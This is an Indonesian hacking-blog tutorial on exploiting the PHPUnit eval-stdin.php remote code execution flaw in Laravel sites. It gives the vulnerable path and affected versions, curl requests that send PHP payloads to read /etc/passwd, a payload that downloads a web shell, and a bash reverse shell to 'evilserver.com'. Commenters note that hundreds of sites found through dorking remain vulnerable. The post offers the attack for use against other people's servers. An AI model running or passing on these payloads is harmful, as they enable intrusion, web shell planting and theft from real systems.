• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Laravel PHPUnit Remote Code Execution

June 16, 2019 by Jack Wilder 11 Comments

Laravel PHPUnit Remote Code Execution. Sebenarnya ini bug sudah lama banget. Tapi jujur saja saya juga gak tau karena memang sudah jarang banget update masalah exploit. Nah karena exploit ini kembali rame, akhirnya saya coba share aja deh di blog barangkali ada yang belum tau. Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit, bukan dari Laravelnya.

  • Vuln: eval-stdin.php
  • Full Path Exploit : http://target/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • Affected versions : Before 4.8.28 and 5.x before 5.6.3

Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa. Disini saya share yang pake curl dulu karena menurut saya ini yang paling simple.

Gunakan parameter -d atau –data untuk mengirim payloadnya. Payload yang bisa digunakan:

<?php system('tail /etc/passwd'); ?>
<?php echo php_uname(); ?>
<?php show_source('/etc/passwd'); ?>

Contoh command

curl -d "<?php echo php_uname(); ?>" http://webtarget/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Kalau ingin spawn shell ya tinggal diubah payloadnya menjadi wget misalnya

<?php system('wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php'; ?>

Atau diubah ke perintah untuk backconnect

<?php system('bash -i >& /dev/tcp/evilserver.com/666 0>&1');?>

Lalu di evil server dilisten ke port 666.

Atau, kalian bisa menggunakan Burpsuite.

Intercept, lalu kirim requestnya ke repeater.

Lalu klik menu Repeater, masukkan payloadnya dibawah, dan klik tombol Go.

Untuk responnya bisa dilihat di sebelah kolom request (sebelah kanan).

Oke mungkin itu saja tutorial kali ini, sekian dan semoga bermanfaat.

Shares

Filed Under: RCE

Reader Interactions

Comments

  1. Yohanes Gultom says

    June 18, 2019 at 7:18 am

    Ini kayaknya hanya berlaku kalau konfigurasi web server nya aneh-aneh sih. Standar setting web server untuk Laravel kan semua request ke / diarahkan ke public/index.php ?

    Reply
    • Yoo Cherry says

      June 21, 2019 at 5:43 pm

      yup betul. xD
      tapi saya dorking cukup terkejut juga ada mungkin ratusan web yang masih vuln .

      Reply
  2. menkrep1337 says

    June 22, 2019 at 4:54 pm

    Klo dipencet Malah kedownload atau redirect apakah itu gak vuln Y

    Reply
    • KingEncryptor says

      July 16, 2019 at 12:56 pm

      Kalo lu klik pada file eval-stdin.php ya otomatis nge Download lah, gausah di klik. Tapi pas exploit pake CURL tinggal tambahin /eval-stdin.php

      Reply
  3. ibnu muhammad says

    June 26, 2019 at 4:52 pm

    ini termasuk kategori lfi bukan sih ?

    Reply
    • KaoriChan says

      June 27, 2019 at 9:00 pm

      kayaknya bukan deh lbh ke RCE

      Reply
      • Alif Ardiansyah says

        October 8, 2019 at 9:06 pm

        Itu pake Linux yh?

        Reply
  4. Tra says

    September 3, 2019 at 2:26 am

    Kalo responsenya 500 Internal Server gmn tuh? (pake burp)

    Reply
  5. Turk'sHacker says

    September 13, 2019 at 10:26 pm

    Literally PHP Code Injection

    Reply
    • anak lonte says

      February 28, 2020 at 2:00 pm

      Lonte

      Reply
  6. hilih says

    February 28, 2020 at 2:01 pm

    Hilih

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

Hack Targeted Website using Reverse IP

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Upload Backdoor Lewat MySQL Database (phpMyAdmin)

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Zendesk Custom Domain or Subdomain Takeover

Open Redirect Bypass Cheat Sheet

Woocommerce Custom Tshirt Desginer CSRF Shell Upload Vulnerability

LinuxSec / 79 queries in 0.11 seconds